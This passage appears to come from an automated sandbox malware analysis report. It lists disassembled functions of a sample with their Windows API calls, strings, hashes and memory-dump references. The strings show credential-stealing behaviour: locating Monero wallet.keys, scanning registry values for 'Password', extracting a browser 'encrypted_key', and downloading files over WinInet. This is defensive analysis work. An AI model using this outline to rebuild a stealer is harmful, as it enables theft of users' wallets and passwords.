                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 69309068ce080e016864761b81e2aafd688e95002bcdf1ea277f5eeaf27d9058
                          • Instruction ID: 76a70922e8b198612253767087d71a19f8e6301268de5a91cbe0d1e8c14cbf42
                          • Opcode Fuzzy Hash: 69309068ce080e016864761b81e2aafd688e95002bcdf1ea277f5eeaf27d9058
                          • Instruction Fuzzy Hash: D2510C3091014AABDB14EF60C9AAAED7F79BF90302F504119FC065A592EF346B49CB66
                          Function 005512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 164e70e7529968c60031cd04515c48adf3d70d4cf64135c5535d65596e100a98
                          • Instruction ID: 96d7e9f77bb8ac1c35246eed8e81c9395d597179039a7a7c1e1291008d59d47e
                          • Opcode Fuzzy Hash: 164e70e7529968c60031cd04515c48adf3d70d4cf64135c5535d65596e100a98
                          • Instruction Fuzzy Hash: 42C1E8B590010DABCB14EF60DC9DFEA7B78BF94301F10459AF90A67141EB74AA89CF91
                          Function 00554280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 005542EC
                          • lstrcat.KERNEL32(?,0123F548), ref: 0055430B
                          • lstrcat.KERNEL32(?,?), ref: 0055431F
                          • lstrcat.KERNEL32(?,0123DA18), ref: 00554333
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F
                            • Part of subcall function 00549CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39
                            • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                            • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                            • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                            • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                            • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                            • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                            • Part of subcall function 005593C0: GlobalAlloc.KERNEL32(00000000,005543DD,005543DD), ref: 005593D3
                          • StrStrA.SHLWAPI(?,0123F4D0), ref: 005543F3
                          • GlobalFree.KERNEL32(?), ref: 00554512
                            • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                            • Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                            • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                            • Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 005544A3
                          • StrCmpCA.SHLWAPI(?,005608D1), ref: 005544C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005544D2
                          • lstrcat.KERNEL32(00000000,?), ref: 005544E5
                          • lstrcat.KERNEL32(00000000,00560FB8), ref: 005544F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 9969f51f7dd3e69d981508520a37a2e7b3098bc2cba8ecd400570ae7dfc5432d
                          • Instruction ID: 0990c37587f8534da9e214494aab66485a8eee2ff12162991886b9a421ee8f96
                          • Opcode Fuzzy Hash: 9969f51f7dd3e69d981508520a37a2e7b3098bc2cba8ecd400570ae7dfc5432d
                          • Instruction Fuzzy Hash: 3B717A76900209B7DB14EBB0DC99FEE7778BB88305F008599F60597181EA34DB49CFA1
                          Function 00541310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
                            • Part of subcall function 005412A0: RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
                            • Part of subcall function 005412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005412D7
                            • Part of subcall function 005412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
                            • Part of subcall function 005412A0: RegCloseKey.ADVAPI32(?), ref: 005412FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0054134F
                          • lstrlen.KERNEL32(?), ref: 0054135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00541377
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0123ED70,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00541465
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                            • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                            • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                            • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                            • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                            • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 005414EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 3513eab9574f870ac3008d1e90211fe956cbb6912b7b78d6692f58a620c644ec
                          • Instruction ID: 8bd5bca6df3892e5a226774a2ee33e6d60d2f5b283a2db29aa0b74d1655ca757
                          • Opcode Fuzzy Hash: 3513eab9574f870ac3008d1e90211fe956cbb6912b7b78d6692f58a620c644ec
                          • Instruction Fuzzy Hash: 595145B1D5011A57CB15FB60DDA6FED773CBF94301F404299B60A62081EE346B89CFA6
                          Function 005475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005472D0: memset.MSVCRT ref: 00547314
                            • Part of subcall function 005472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
                            • Part of subcall function 005472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
                            • Part of subcall function 005472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
                            • Part of subcall function 005472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
                            • Part of subcall function 005472D0: HeapFree.KERNEL32(00000000), ref: 00547459
                          • lstrcat.KERNEL32(00000000,005617FC), ref: 00547606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00547648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0054765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0054768F
                          • lstrcat.KERNEL32(00000000,00561804), ref: 005476A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005476D3
                          • lstrcat.KERNEL32(00000000,00561808), ref: 005476ED
                          • task.LIBCPMTD ref: 005476FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: :
                          • API String ID: 3191641157-3653984579
                          • Opcode ID: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
                          • Instruction ID: 044deabaefb69752478f4a9cd8b8b0ef747b106a024b79909f6d9db1906845c1
                          • Opcode Fuzzy Hash: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
                          • Instruction Fuzzy Hash: 12318371A4010AEFDB04EBB4DC59DFF7B75FB88305B24810AF102A7251EB38A946CB65
                          Function 005472D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00547314
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
                          • HeapFree.KERNEL32(00000000), ref: 00547459
                          • task.LIBCPMTD ref: 00547555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: Password
                          • API String ID: 2808661185-3434357891
                          • Opcode ID: 24ba2bea9ba16a8ee07ac987d098acf05121936016b5e0a8fa29ae64a50be244
                          • Instruction ID: dfd562b83884cecb16fbd4e1631704645cd817438414521d642774f6791628f7
                          • Opcode Fuzzy Hash: 24ba2bea9ba16a8ee07ac987d098acf05121936016b5e0a8fa29ae64a50be244
                          • Instruction Fuzzy Hash: 9E613CB590426D9BDB24DB50CC45FEABBB8BF48304F0085E9E649A6141DBB05FC9CFA1
                          Function 00558100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0123F290,00000000,?,00560E2C,00000000,?,00000000), ref: 00558130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00558137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00558158
                          • __aulldiv.LIBCMT ref: 00558172
                          • __aulldiv.LIBCMT ref: 00558180
                          • wsprintfA.USER32 ref: 005581AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: 66776c86fd9d64b2b99acdc9d6571ba718b252245f3221c2208afdc0377d4914
                          • Instruction ID: 3baf981012064c3505892516461b4277773cbd6ad6e3eb0abb3d9f34f52027b9
                          • Opcode Fuzzy Hash: 66776c86fd9d64b2b99acdc9d6571ba718b252245f3221c2208afdc0377d4914
                          • Instruction Fuzzy Hash: DC214FB1E44209ABEB10DFD4CC49FAFBB78FB44711F20450AF605BB280D77869058BA5
                          Function 005460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                            • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                          • InternetOpenA.WININET(00560DF7,00000001,00000000,00000000,00000000), ref: 0054610F
                          • StrCmpCA.SHLWAPI(?,0123FBD0), ref: 00546147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0054618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005461B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 005461DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0054620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00546249
                          • InternetCloseHandle.WININET(?), ref: 00546253
                          • InternetCloseHandle.WININET(00000000), ref: 00546260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 59507e7f1c8fac8384882174f9546b8e9fb74a86fdcf1cc9a9fdece59affcd34
                          • Instruction ID: af584ca26c0e9cd2120ff875c94e8d6bb48393cec1f3a023caf0e4bef631a4e1
                          • Opcode Fuzzy Hash: 59507e7f1c8fac8384882174f9546b8e9fb74a86fdcf1cc9a9fdece59affcd34
                          • Instruction Fuzzy Hash: 035194B1940208BBEF20DF60DC49BEE7B78FB44705F108599B605A71C1DBB46A89CF96
                          Function 0054BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0054BC9F
                            • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0054BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0054BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0054BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
